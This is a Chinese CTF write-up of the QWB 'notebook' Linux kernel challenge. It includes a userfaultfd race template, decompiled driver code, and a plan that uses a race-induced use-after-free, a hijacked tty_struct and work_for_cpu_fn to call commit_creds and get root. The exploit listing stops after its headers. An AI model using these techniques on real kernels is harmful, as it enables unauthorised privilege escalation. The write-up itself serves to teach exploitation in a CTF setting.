    static int fault_cnt = 0; /* Number of faults so far handled */
    long uffd; /* userfaultfd file descriptor */
    static char *page = NULL;
    struct uffdio_copy uffdio_copy;
    ssize_t nread;

    uffd = (long) arg;

    /* Create a page that will be copied into the faulting region */
    if (page == NULL) {
        page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (page == MAP_FAILED)
            errExit("mmap");
    }

    /* Loop, handling incoming events on the userfaultfd
       file descriptor */
    for (;;) {
        /* See what poll() tells us about the userfaultfd */
        struct pollfd pollfd;
        int nready;

        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);
        if (nready == -1)
            errExit("poll");

        printf("\nfault_handler_thread():\n");
        printf(" poll() returns: nready = %d; "
               "POLLIN = %d; POLLERR = %d\n", nready,
               (pollfd.revents & POLLIN) != 0,
               (pollfd.revents & POLLERR) != 0);

        /* Read an event from the userfaultfd */
        nread = read(uffd, &msg, sizeof(msg));
        if (nread == 0) {
            printf("EOF on userfaultfd!\n");
            exit(EXIT_FAILURE);
        }
        if (nread == -1)
            errExit("read");

        /* We expect only one kind of event; verify that assumption */
        if (msg.event != UFFD_EVENT_PAGEFAULT) {
            fprintf(stderr, "Unexpected event on userfaultfd\n");
            exit(EXIT_FAILURE);
        }

        /* Display info about the page-fault event */
        printf(" UFFD_EVENT_PAGEFAULT event: ");
        printf("flags = %llx; ", msg.arg.pagefault.flags);
        printf("address = %llx\n", msg.arg.pagefault.address);

        /* Copy the page pointed to by 'page' into the faulting
           region. Vary the contents that are copied in, so that it
           is more obvious that each fault is handled separately. */
        memset(page, 'A' + fault_cnt % 20, page_size);
        fault_cnt++;

        uffdio_copy.src = (unsigned long) page;
        /* We need to handle page faults in units of pages(!).
           So, round faulting address down to page boundary */
        uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
                          ~(page_size - 1);
        uffdio_copy.len = page_size;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");

        printf(" (uffdio_copy.copy returned %lld)\n",
               uffdio_copy.copy);
    }

    return NULL; /* not reached; keeps the pthread start-routine contract explicit */
}
我们的整个手册上的测试用例如下:
/* userfaultfd_demo.c
Licensed under the GNU General Public License version 2 or later.
*/
#define _GNU_SOURCE
#include <sys/types.h>
#include <stdio.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <poll.h>
#define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); \
} while (0)
static int page_size;
static void *
fault_handler_thread(void *arg)
{
static struct uffd_msg msg; /* Data read from userfaultfd */
static int fault_cnt = 0; /* Number of faults so far handled */
long uffd; /* userfaultfd file descriptor */
static char *page = NULL;
struct uffdio_copy uffdio_copy;
ssize_t nread;
uffd = (long) arg;
/* Create a page that will be copied into the faulting region */
if (page == NULL) {
page = mmap(NULL, page_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (page == MAP_FAILED)
errExit("mmap");
}
/* Loop, handling incoming events on the userfaultfd
file descriptor */
for (;;) {
/* See what poll() tells us about the userfaultfd */
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);
if (nready == -1)
errExit("poll");
printf("\nfault_handler_thread():\n");
printf(" poll() returns: nready = %d; "
"POLLIN = %d; POLLERR = %d\n", nready,
(pollfd.revents & POLLIN) != 0,
(pollfd.revents & POLLERR) != 0);
/* Read an event from the userfaultfd */
nread = read(uffd, &msg, sizeof(msg));
if (nread == 0) {
printf("EOF on userfaultfd!\n");
exit(EXIT_FAILURE);
}
if (nread == -1)
errExit("read");
/* We expect only one kind of event; verify that assumption */
if (msg.event != UFFD_EVENT_PAGEFAULT) {
fprintf(stderr, "Unexpected event on userfaultfd\n");
exit(EXIT_FAILURE);
}
/* Display info about the page-fault event */
printf(" UFFD_EVENT_PAGEFAULT event: ");
printf("flags = %llx; ", msg.arg.pagefault.flags);
printf("address = %llx\n", msg.arg.pagefault.address);
/* Copy the page pointed to by 'page' into the faulting
region. Vary the contents that are copied in, so that it
is more obvious that each fault is handled separately. */
memset(page, 'A' + fault_cnt % 20, page_size);
fault_cnt++;
uffdio_copy.src = (unsigned long) page;
/* We need to handle page faults in units of pages(!).
So, round faulting address down to page boundary */
uffdio_copy.dst = (unsigned long) msg.arg.pagefault.address &
~(page_size - 1);
uffdio_copy.len = page_size;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
errExit("ioctl-UFFDIO_COPY");
printf(" (uffdio_copy.copy returned %lld)\n",
uffdio_copy.copy);
}
}
int
main(int argc, char *argv[])
{
long uffd; /* userfaultfd file descriptor */
char *addr; /* Start of region handled by userfaultfd */
unsigned long len; /* Length of region handled by userfaultfd */
pthread_t thr; /* ID of thread that handles page faults */
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;
if (argc != 2) {
fprintf(stderr, "Usage: %s num-pages\n", argv[0]);
exit(EXIT_FAILURE);
}
page_size = sysconf(_SC_PAGE_SIZE);
len = strtoul(argv[1], NULL, 0) * page_size;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
/* Create a private anonymous mapping. The memory will be
demand-zero paged--that is, not yet allocated. When we
actually touch the memory, it will be allocated via
the userfaultfd. */
addr = mmap(NULL, len, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (addr == MAP_FAILED)
errExit("mmap");
printf("Address returned by mmap() = %p\n", addr);
/* Register the memory range of the mapping we just created for
handling by the userfaultfd object. In mode, we request to track
missing pages (i.e., pages that have not yet been faulted in). */
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
s = pthread_create(&thr, NULL, fault_handler_thread, (void *) uffd);
if (s != 0) {
errno = s;
errExit("pthread_create");
}
/* Main thread now touches memory in the mapping, touching
locations 1024 bytes apart. This will trigger userfaultfd
events for all pages in the region. */
int l;
l = 0xf; /* Ensure that faulting address is not on a page
boundary, in order to test that we correctly
handle that case in fault_handling_thread() */
while (l < len) {
char c = addr[l];
printf("Read address %p in main(): ", addr + l);
printf("%c\n", c);
l += 1024;
usleep(100000); /* Slow things down a little */
}
exit(EXIT_SUCCESS);
}
情况如下:
我们可以参考到,在mmap之后也就是最上面的红线所得到的地址,我们在第一次访问他时出现了缺页异常,因此我们的轮询线程检测到我们之前定义的监控范围内出现异常,这使得该函数可以继续运行,因此将该内存区域填充A,所以在我们处理完了用户版的缺页异常后,该内存区域内全是A。
说了这么多我们会发现利用他是如此繁琐的一个过程,所以干脆咱们现在来写一个userfaultfd的万能板子,到时候写题就不需要重新回顾这些变量名了:
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/userfaultfd.h>
#include <poll.h>
#include <poll.h>
#include <pthread.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <unistd.h>
#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)
static int page_size;
int userfaultfd_attack(char* addr, unsigned long len, void (*handler)(void *)){
long uffd;
pthread_t thr;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;
/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if(uffd == -1)
errExit("userfaultfd");
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if(ioctl(uffd, UFFDIO_API, &uffdio_api) == -1)
errExit("ioctl-UFFDIO_API");
uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if(ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1)
errExit("ioctl-UFFDIO_REGISTER");
/* Create a thread that will process the userfaultfd events */
s = pthread_create(&thr, NULL, handler, (void *)uffd);
if(s != 0){
errno = s;
errExit("pthread_create");
}
}
有了上面的代码,我们就可以只需要使用userfaultfd_attack(addr, len, handler)
就可以避免刚才咱们的一系列初始化步骤了,之后就是比较重要的handler函数的编写,这一部分更主要的是靠我们在赛时自行思考diy,这里给出较为通用的模板,也就是linux手册上面的,如下:
static char* page; /* the data you want to overwrite */
/*
 * Generic userfaultfd handler template.
 *
 * arg carries the userfaultfd descriptor cast to a pointer. Every reported
 * page fault is resolved by copying one page from the global `page` buffer
 * into the faulting page. The loop never ends on its own; any error
 * terminates the process.
 */
static void* fault_handler_thread(void * arg){
    static struct uffd_msg msg;     /* data read from userfaultfd */
    long uffd;                      /* userfaultfd file descriptor */
    struct uffdio_copy uffdio_copy;
    ssize_t nread;
    /* Fall back to the system page size when page_size was never set; a zero
       page_size would turn the copy below into a zero-length copy to address 0. */
    unsigned long psize = page_size > 0 ? (unsigned long)page_size
                                        : (unsigned long)sysconf(_SC_PAGE_SIZE);

    uffd = (long)arg;

    /* Loop, handling incoming events on the userfaultfd file descriptor */
    for(;;){
        /* See what poll() tells us about the userfaultfd */
        struct pollfd pollfd;
        int nready;

        pollfd.fd = uffd;
        pollfd.events = POLLIN;
        nready = poll(&pollfd, 1, -1);
        if(nready == -1)
            errExit("poll");

        /* Read an event from the userfaultfd */
        nread = read(uffd, &msg, sizeof(msg));
        if(nread == 0){
            printf("EOF on userfaultfd!\n");
            exit(EXIT_FAILURE);
        }
        if(nread == -1)
            errExit("read");

        /* We expect only one kind of event; verify that assumption */
        if(msg.event != UFFD_EVENT_PAGEFAULT){
            fprintf(stderr, "Unexpected event on userfaultfd\n");
            exit(EXIT_FAILURE);
        }

        /* copy things to the addr */
        uffdio_copy.src = (unsigned long) page;
        /* We need to handle page faults in units of pages(!).
         * So, round faulting address down to page boundary */
        uffdio_copy.dst = (unsigned long)msg.arg.pagefault.address & ~(psize - 1);
        uffdio_copy.len = psize;
        uffdio_copy.mode = 0;
        uffdio_copy.copy = 0;
        if(ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)
            errExit("ioctl-UFFDIO_COPY");
    }

    return NULL; /* not reached */
}
2. 题目逆向
首先,启动脚本
qemu-system-x86_64 -m 64M \
-kernel bzImage \
-initrd rootfs.cpio \
-append "loglevel=0 console=ttyS0 oops=panic panic=1 kaslr" \
-nographic \
-net user -net nic -device e1000 -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
-monitor /dev/null 2>/dev/null -s \
-no-reboot
- 双核双线程
- 开启kaslr
- smep/smap开启
- kpti开启
:disappointed: 很特么绝望,跟userland第一次看到保护全开一片绿的感觉,然后我们查看文件系统的init脚本,如下:
#!/bin/sh
/bin/mount -t devtmpfs devtmpfs /dev
chown root:tty /dev/console
chown root:tty /dev/ptmx
chown root:tty /dev/tty
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
mount -t proc proc /proc
mount -t sysfs sysfs /sys
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
ifup eth0 > /dev/null 2>/dev/null
chown root:root /flag
chmod 600 /flag
insmod notebook.ko
cat /proc/modules | grep notebook > /tmp/moduleaddr
chmod 777 /tmp/moduleaddr
chmod 777 /dev/notebook
#poweroff -d 300 -f &
echo "Welcome to QWB!"
#sh
setsid cttyhack setuidgid 1000 sh
umount /proc
umount /sys
poweroff -d 1 -n -f
发现插入了一个notebook.ko模块,然后我们运行该内核看看基本情况
/ $ uname -a
Linux (none) 4.15.8 #3 SMP Thu Jun 3 01:01:56 PDT 2021 x86_64 GNU/Linux
/ $ lsmod
Module Size Used by Tainted: G
notebook 16384 0
/ $ dmesg
dmesg: klogctl: Operation not permitted
可以看到令我们欣慰的一点是内核版本还不算很高 :happy:,然后我们打开ida反编译一下notebook.ko看看
.rodata:0000000000000800 ; ===========================================================================
.rodata:0000000000000800
.rodata:0000000000000800 ; Segment type: Pure data
.rodata:0000000000000800 ; Segment permissions: Read
.rodata:0000000000000800 _rodata segment align_32 public 'CONST' use64
.rodata:0000000000000800 assume cs:_rodata
.rodata:0000000000000800 ;org 800h
.rodata:0000000000000800 ; const file_operations mynote_fops
.rodata:0000000000000800 C0 09 00 00 00 00 00 00 00 00+mynote_fops file_operations <offset __this_module, 0, 0, offset mynote_write, 0, 0, 0, 0, 0, \
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+ ; DATA XREF: .data:mynote_dev↓o
.rodata:0000000000000800 00 00 00 00 80 00 00 00 00 00+ offset mynote_ioctl, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0>
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+_rodata ends
.rodata:0000000000000800 00 00 00 00 00 00 00 00 00 00+
__mcount_loc:00000000000008F8 ; ===========================================================================
__mcount_loc:00000000000008F8
__mcount_loc:00000000000008F8 ; Segment type: Pure data
__mcount_loc:00000000000008F8 ; Segment permissions: Read
__mcount_loc:00000000000008F8 __mcount_loc segment qword public 'CONST' use64
__mcount_loc:00000000000008F8 assume cs:__mcount_loc
__mcount_loc:00000000000008F8 ;org 8F8h
__mcount_loc:00000000000008F8 00 00 00 00 00 00 00 00 dq offset mynote_read
__mcount_loc:0000000000000900 80 00 00 00 00 00 00 00 dq offset mynote_write
__mcount_loc:0000000000000908 10 01 00 00 00 00 00 00 dq offset noteadd
__mcount_loc:0000000000000910 00 02 00 00 00 00 00 00 dq offset notedel
__mcount_loc:0000000000000918 80 02 00 00 00 00 00 00 dq offset noteedit
__mcount_loc:0000000000000920 90 03 00 00 00 00 00 00 dq offset notegift
__mcount_loc:0000000000000928 E0 03 00 00 00 00 00 00 dq offset mynote_ioctl
__mcount_loc:0000000000000930 74 04 00 00 00 00 00 00 dq offset mynote_init
__mcount_loc:0000000000000930 __mcount_loc ends
一个一个看吧 :bomb:
mynote_init
本身为加载一个misc设备的初始化函数,如下:
/* Module init (IDA pseudocode): registers the misc device, initialises the
 * global rwlock `lock`, prints a banner and returns misc_register()'s result. */
int __cdecl mynote_init()
{
int v0; // ebx
_fentry__();
v0 = misc_register(&mynote_dev); // per the write-up: the kernel keeps a misc_list linked list and misc_register links the device into it
_rwlock_init(&lock, "&lock", &krealloc); // initialise the read-write lock
printk("Welcome to BrokenNotebook!\n");
return v0;
}
这里涉及到一个Linux中读写锁rwlock的概念
rwlock 主要有以下几种特征:
- 多进程对临界区的读不互斥,可同步进行,互不影响
- 如果要执行写,需要等所有的读者退出才能执行写操作
- 如果正在执行写操作且未完成,这一阶段发生的读操作会被阻塞,即读写互斥
- 如果正在执行写操作且未完成,这一阶段发生的写操作会被阻塞,即写写互斥
- 不造成睡眠,等待形式是自旋
这种场景有点像行人过马路,公交车司机必须停在斑马线前等待所有行人过完马路才能继续往前开,在繁忙的时段,不断地有行人走过,就会导致公交车一直止步不前,甚至造成堵车。
这也是 rwlock 的一大缺点:写者优先级太低,在极端情况下甚至出现饿死的情况,也即是说该锁是一个读优先锁
mynote_exit
撤销该驱动时的退出函数
/* Module exit handler (IDA pseudocode): kfree()s the note buffer of each of
 * the 16 notebook entries, then unregisters the misc device. */
void __cdecl mynote_exit()
{
    note *v0; // rbx
    void *note; // rdi
    v0 = notebook;
    do
    {
        note = v0->note;
        ++v0;
        kfree(note);
    }
    while ( v0 != &notebook[16] ); // stop one past the last entry
    misc_deregister(&mynote_dev);
}
mynote_ioctl
覆盖了ioctl函数,如下:
/* ioctl entry point (IDA pseudocode).
 * Copies a 24-byte userarg {idx, size, buf} from user space and dispatches:
 *   0x100 -> noteadd(idx, size, buf)
 *   0x64  -> notegift(buf)
 *   0x200 -> notedel(idx)
 *   0x300 -> noteedit(idx, size, buf)
 * Any other cmd logs an error and returns -100.
 * NOTE(review): v3 is the decompiler's name for the rdx register, i.e. it
 * presumably aliases `arg` - confirm against the disassembly. */
__int64 __fastcall mynote_ioctl(file *file, unsigned int cmd, unsigned __int64 arg)
{
    __int64 v3; // rdx
    userarg notearg; // [rsp+0h] [rbp-28h] BYREF
    _fentry__(file, cmd, arg);
    copy_from_user(&notearg, v3, 24LL); // return value is not checked
    if ( cmd == 0x100 )
        return noteadd(notearg.idx, notearg.size, notearg.buf);
    if ( cmd <= 0x100 )
    {
        if ( cmd == 0x64 )
            return notegift(notearg.buf);
    }
    else
    {
        if ( cmd == 0x200 )
            return notedel(notearg.idx);
        if ( cmd == 0x300 )
            return noteedit(notearg.idx, notearg.size, notearg.buf);
    }
    printk("[x] Unknown ioctl cmd!\n");
    return -100LL;
}
我们得以知道在调用ioctl函数时,首先需要传递一个大小为24字节的数据结构,然后将其复制到上面的notearg
当中,然后存在下面几个选项
notearg(0x18) |
idx(0x8) |
size(0x8) |
buf(0x8) |
- 0x100:以
notearg
为参数,调用noteadd
,也就是添加notebook;
- 0x64:调用
notegift
, 泄露notebook数组内容, 该notebook就是note数据结构作为元素的数组,里面包含了一系列内核地址,也就是说kaslr不值一提😊
- 0x200:调用
notedel
, 根据idx来释放对应的内核堆块,并根据notebook相应idx中的size是否非0来决定是否将指针和size清零;正常(单线程)情况下del时size不会为0,即使事先调用过noteedit也是如此
- 0x300:以
notearg
为参数,调用noteedit
,用来修改notebook单元中的size(不可为0)和note字段
这里我们还有一个notebook的数据结构
noteadd(read_lock)
使用我们传入的userarg结构体,其中要求idx不能大于0xF,以及size不能大于0x60,还有就是本身的note指针不能有值,不然都会直接返回
若上述条件均满足,我们就可以将我们userarg中的buf参数值传递给内核bss段上的name了,注意这里并不是note的值,此时内核就会使用kmalloc(size, _GFP*)来申请一个object给我们notebook对应下标的note值,这里使用了读锁,但并没太大关系
/* Add a note (IDA pseudocode). Runs under the READ side of `lock`.
 * Returns 0 on success, -1 if idx > 0xF, -2 if size > 0x60,
 * -3 if the slot already holds a note.
 * Note the ordering: the slot's size is overwritten BEFORE the size check
 * and before copy_from_user(); it is only restored on the error paths.
 * NOTE(review): content_0 is the decompiler's name for rdx, presumably `buf`. */
__int64 __fastcall noteadd(size_t idx, size_t size, void *buf)
{
    __int64 content_0; // rdx
    __int64 content_1; // r13
    note *note_addr; // rbx
    size_t orig_size; // r14
    __int64 ret_value; // rbx
    (_fentry__)(idx, size, buf);
    if ( idx > 0xF ) // idx may be at most 0xF
    {
        ret_value = -1LL;
        printk("[x] Add idx out of range.\n");
    }
    else
    {
        content_1 = content_0;
        note_addr = &notebook[idx]; // notebook is a global array; take the address of slot idx
        raw_read_lock(&lock);
        orig_size = note_addr->size; // remember the old size so it can be restored
        note_addr->size = size; // store the caller-supplied size
        if ( size > 0x60 ) // too large: roll the size back
        {
            note_addr->size = orig_size;
            ret_value = -2LL;
            printk("[x] Add size out of range.\n");
        }
        else
        {
            copy_from_user(name, content_1, 256LL); // name is another global; it receives 256 bytes from notearg.buf
            if ( note_addr->note ) // slot already in use: roll the size back
            {
                note_addr->size = orig_size;
                ret_value = -3LL;
                printk("[x] Add idx is not empty.\n");
            }
            else
            {
                note_addr->note = _kmalloc(size, 0x24000C0LL); // allocate the note buffer
                printk("[+] Add success. %s left a note.\n", name);
                ret_value = 0LL;
            }
        }
        raw_read_unlock(&lock);
    }
    return ret_value;
}
notegift
该函数会将notebook的内容传递给我们的userarg.buf,出题人很温柔:hibiscus:
/* "Gift" ioctl (IDA pseudocode): copies the first 256 bytes of the global
 * notebook array to the user buffer `buf` and returns 100. */
__int64 __fastcall notegift(void *buf)
{
_fentry__(buf);
printk(" The notebook needs to be written from beginning to end.\n");
copy_to_user(buf, notebook, 256LL); // hands the notebook contents (which hold kernel addresses, per the write-up) to user space
printk(" For this special year, I give you a gift!\n");
return 100LL;
}
notedel(write_lock)
通过给定的idx来删除堆块,这里我们看到,首先是一个加了一个写锁,很难绷,然后获取相应idx的note后,调用kfree,挂在kmem_cache上?然后根据size来判断是否将对应位清0,但是按照正常单线程的话这个值不会为0的,即使调用noteedit也不会出现这种情况
/* Delete a note (IDA pseudocode). Runs under the WRITE side of `lock`.
 * kfree()s the slot's buffer unconditionally, but clears the slot's
 * pointer and size only when the stored size is non-zero.
 * Returns 0 on success, -1 if idx is rejected.
 * NOTE(review): the bound is `> 0x10` whereas noteadd/noteedit use `> 0xF`,
 * so idx == 0x10 is accepted here - one past the 16 entries mynote_exit walks. */
__int64 __fastcall notedel(size_t idx)
{
    note *v1; // rbx
    _fentry__(idx);
    if ( idx > 0x10 )
    {
        printk("[x] Delete idx out of range.\n");
        return -1LL;
    }
    else
    {
        raw_write_lock(&lock);
        v1 = &notebook[idx];
        kfree(v1->note);
        if ( v1->size ) // the slot is only cleared when size is non-zero
        {
            v1->size = 0LL;
            v1->note = 0LL;
        }
        raw_write_unlock(&lock);
        printk("[-] Delete success.\n");
        return 0LL;
    }
}
mynote_read
读notebook的内容奥,这时我们将读取我们rdx参数指向的对应note至我们的buf那儿
/* read() handler (IDA pseudocode). The third argument (normally the byte
 * count) is used as a note index: the slot's `size` bytes are copied from
 * its buffer to the user pointer `buf`. No lock is taken here.
 * Returns 0 on success, -1 if the index is rejected.
 * NOTE(review): v4 is the decompiler's name for rdx, presumably `idx`.
 * NOTE(review): the bound is `> 0x10`, so index 0x10 is accepted although
 * mynote_exit only walks 16 entries. */
ssize_t __fastcall mynote_read(file *file, char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx
_fentry__(file, buf, idx);
if ( v4 > 0x10 )
{
printk("[x] Read idx out of range.\n");
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 1LL);
copy_to_user(buf, note, size);
printk(" Read success.\n");
return 0LL;
}
}
mynote_write
可以看到,这里我们才是真正地写入了note结构体中note字段所指向的内存,即使在noteadd的时候我们也并没有向其中写入内容
/* write() handler (IDA pseudocode). The third argument (normally the byte
 * count) is used as a note index: the slot's `size` bytes are copied from
 * the user pointer `buf` into the slot's buffer. No lock is taken here.
 * Returns 0 whether or not the copy succeeded, -1 if the index is rejected.
 * NOTE(review): v4 is the decompiler's name for rdx, presumably `idx`.
 * NOTE(review): the bound is `> 0x10`, so index 0x10 is accepted although
 * mynote_exit only walks 16 entries. */
ssize_t __fastcall mynote_write(file *file, const char *buf, size_t idx, loff_t *pos)
{
unsigned __int64 v4; // rdx
unsigned __int64 v5; // rdx
size_t size; // r13
void *note; // rbx
_fentry__(file);
if ( v4 > 0x10 )
{
printk("[x] Write idx out of range.\n", buf);
return -1LL;
}
else
{
v5 = v4;
size = notebook[v5].size;
note = notebook[v5].note;
_check_object_size(note, size, 0LL);
if ( copy_from_user(note, buf, size) )
printk("[x] copy from user error.\n");
else
printk(" Write success.\n");
return 0LL;
}
}
noteedit(read_lock)
有读锁,我们的新name是我们的userarg.buf,然后我们会调用krealloc来重新分配堆块,这里会判断size是否为0,若为0则把note指针清空,所以在单线程的正常流程下我们无法仅靠传递size为0来得到UAF
/* Resize a note (IDA pseudocode). Runs under the READ side of `lock`.
 * Return values: -1 idx > 0xF; 1 size unchanged; 0 slot size is zero after
 * the copy (pointer cleared); 2 buffer reallocated; 3 krealloc result
 * failed _virt_addr_valid().
 * Note the ordering: the new size is stored and krealloc() is called BEFORE
 * copy_from_user(); the slot's pointer is only updated or cleared afterwards.
 * NOTE(review): v3 is the decompiler's name for rdx, presumably `buf`. */
__int64 __fastcall noteedit(size_t idx, size_t newsize, void *buf)
{
    __int64 v3; // rdx
    __int64 v4; // r13
    note *v5; // rbx
    size_t size; // rax
    __int64 v7; // r12
    __int64 v8; // rbx
    _fentry__(idx);
    if ( idx > 0xF )
    {
        v8 = -1LL;
        printk("[x] Edit idx out of range.\n", newsize);
        return v8;
    }
    v4 = v3;
    v5 = &notebook[idx];
    raw_read_lock(&lock);
    size = v5->size;
    v5->size = newsize;
    if ( size == newsize )
    {
        v8 = 1LL;
        goto editout;
    }
    /* krealloc(p, newsize, flags): returns a buffer of the new size holding
     * the old contents; per the write-up, newsize == 0 simply frees p. */
    v7 = (*krealloc.gap0)(v5->note, newsize, 37748928LL);
    copy_from_user(name, v4, 256LL);
    if ( !v5->size ) // size is zero: treat as a free and clear the pointer
    {
        printk("free in fact");
        v5->note = 0LL;
        v8 = 0LL;
        goto editout;
    }
    if ( _virt_addr_valid(v7) )
    {
        v5->note = v7;
        v8 = 2LL;
editout:
        raw_read_unlock(&lock);
        printk("[o] Edit success. %s edit a note.\n", name);
        return v8;
    }
    printk("[x] Return ptr unvalid.\n");
    raw_read_unlock(&lock);
    return 3LL;
}
3. 利用思路
Krealloc , pwn:v:肯定有点熟悉这个realloc,在这里也是类似的,他的功能就是重新分配堆块,如果传入size为0,则会释放掉他。
我们之前经过分析,这个notedel好像可以使得size为0,然后UAF,事实上也确实如此。
接下来我们试想这样一个场景:
- 存在线程1,线程2,并且其都会通过
copy from user
or copy to user
for accessing the userland.
- 也就是说可以满足我们访问用户区域的条件,此时虽然存在多线程问题,但是触发条件十分艰巨,也就是说我们想要触发我们希望的修改条件,让他们自己跑的话是十分复杂且困难的,就拿两个线程来说,我们需要满足线程1在执行完语句n之后,需要线程2立刻执行自己区域的语句z,然后再回到线程1执行n+1.我们可以料想到这是有多么复杂
- 一切都要归于时间片,他实在是太短且不太好预测,所以线程切换的时机也不是我们可以任意控制的,因此我们可以想到,如果让线程1在执行到需要的语句的时候及时阻塞,然后再调度线程2,这样就可以达成我们需要的调用链
- 因此这里我们采用
userfaultfd
来达成该效果,调用监听线程来使得某线程阻塞,无限拉大线程切换的过程,使我们有足够的时间来做小动作
4.漏洞利用
:one: 使用mmap构造匿名映射区域,将其传入内核,并且将该区域使用userfaultfd来进行监控,到适当时间我们就将他阻塞
:two: 在noteedit的时候,我们如果传入size为0,他会调用krealloc来将我们原本的note->note块释放,然后他会调用copy_from_user
函数,会访问我们用户传入的指针,然后监控线程检测到缺页访问,因此挂起该线程执行操作,但此时我们的note->note是仍然为释放后的堆地址的,且size位为0,因此就达成了一个UAF的条件 ,但是这里我们仍需要将size位置为非零值,因为我们总是要结束线程的,即使他理论上可以延长无限值。如果结束userfaultfd的时候size仍然为0,则按照ida反编译的情况来查看,他会覆盖掉我们的UAF地址,这样就会出现一个非预期错误。
然后size的修改我们采用noteadd函数当中的值,我们发现他是先修改掉size,然后会有个与用户交换数据的过程,此时我们再触发一次userfaultfd
就可以了
:three: 此时如果我们在之前的note的大小为我们特殊构造的话,例如0x2e0,此时我们可以利用tty_struct
来泄露内核的基地址,所以我们此时选择打开ptmx设备,而我们的tty_struct本身是可以泄露内核基地址的,在初始化tty_struct的时候,其中的tty_operations
会初始化为ptm_unix98_ops
或pty_unix98_ops
这两个全局变量,是谁是随机的,所以我们需要有一个判断,这里有一个坑点是我们从objdump -d vmlinux > symtable
中的symtable是找不出这两个全局变量的,我们可以把vmlinux拖入ida中来查找
这里有个难以理解的点就是,我们的tty_struct可能存在分配失败的情况,如下:
:four: 当我们构造了UAF的tty_struct
后,我们就可以将我们的fake_operations
布置在我们的notebook数组当中,这样我们可以任意修改其中的函数指针,就可以尽情的利用它了!
:five: 但是本题基本上能开的保护差不多都开了,所以我们的链条有点难构造,这里有一个小tips,介绍一种在多核内核下基本存在的一个函数work_for_cpu_fn
/* Kernel helper (IDA pseudocode): calls the function pointer stored at
 * a1 + 0x20 with the value stored at a1 + 0x28 as its single argument,
 * stores the result at a1 + 0x30 and also returns it. */
__int64 __fastcall work_for_cpu_fn(__int64 a1)
{
__int64 result; // rax
_fentry__();
result = (*(a1 + 0x20))(*(a1 + 0x28));
*(a1 + 0x30) = result;
return result;
}
可以发现该函数的功能就是以*(rdi+0x28)为参数调用*(rdi+0x20)处的函数指针,并把返回值存放在*(rdi+0x30)当中,而我们的tty_operations
上的函数第一个参数一般都是tty_struct
,所以说我们就可以分次来调用prepare_kernel_cred(NULL)
和commit_creds()
来进行提权,然后我们只需要正常的返回用户态即可,并不需要进行ROP里面的各类绕过,不用找那么多gadget了,很舒服。
:six: 最后我们只需要恢复之前的tty_struct,就可以正常返回并调用system
就可以了
5.结果&Exploit
如图,可达成稳定提权,下面就是本次的exp:
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <poll.h>
#include <string.h>
#include <sys/mman.h>
#include <syscall.h>
#include <poll.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <pthread.h>
#include <errno.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <sched.h>
/* Print `msg` followed by the current errno text, then terminate. */
#define errExit(msg) do{ perror(msg); exit(EXIT_FAILURE); \
} while(0)
/* Integer slots for resolved kernel addresses; zero-initialised (they are
 * integers, so 0 rather than NULL). Not referenced by the visible code. */
size_t commit_creds = 0;
size_t prepare_kernel_cred = 0;
